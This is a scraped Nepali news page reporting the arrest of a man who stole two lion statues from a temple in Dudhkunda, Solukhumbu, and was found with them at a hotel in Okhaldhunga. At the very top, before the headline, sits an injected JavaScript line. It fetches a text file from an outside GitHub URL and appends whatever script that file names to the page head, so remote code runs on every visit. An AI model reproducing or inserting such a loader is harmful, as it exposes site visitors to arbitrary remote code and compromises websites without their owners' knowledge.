;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सोलुखुम्बु दुधकुण्डमा सिंहका दुईवटा मुर्ति चोर्ने पक्राउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सोलुखुम्बु दुधकुण्डमा सिंहका दुईवटा मुर्ति चोर्ने पक्राउ
समाचार

सोलुखुम्बु दुधकुण्डमा सिंहका दुईवटा मुर्ति चोर्ने पक्राउ

भदौ २३,

काठमाडौं । सोलुखुम्बु दुधकुण्ड–८ चागेस्थानमा रहेको चागेस्थान मन्दिरबाट मुर्ति चोरी गर्ने १ जना पक्राउ परेका छन्। पक्राउ पर्नेमा सोही ठाउँका ३५ वर्षीय रमेश मगर रहेका छन्। सोमबार दिउसो साढे १२ बजे मन्दिरबाट दुई वटा सिंहको मुर्ति हराएपछि मन्दिरका समितिले खोजी गर्दा फेला नपरेपछि राति पौने ११ बजे जिल्ला प्रहरी कार्यालय सोलुमा जानकारी गराएका थिए।

घटनाको जानकारी पाएपछि खोजतलासमा खटिएको प्रहरी टोलीले मगरलाई छिमेकी जिल्ला ओखलढुंगाको सिद्धिचरण–११ स्थित एक होटलबाट उनले चोरी गरी लगेको मुर्तिसहित पक्राउ गरेको हो।

पक्राउ परेका मगरलाई कानुनी कारबाही भइरहेको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ।file Photo

फेसबुक प्रतिक्रियाहरु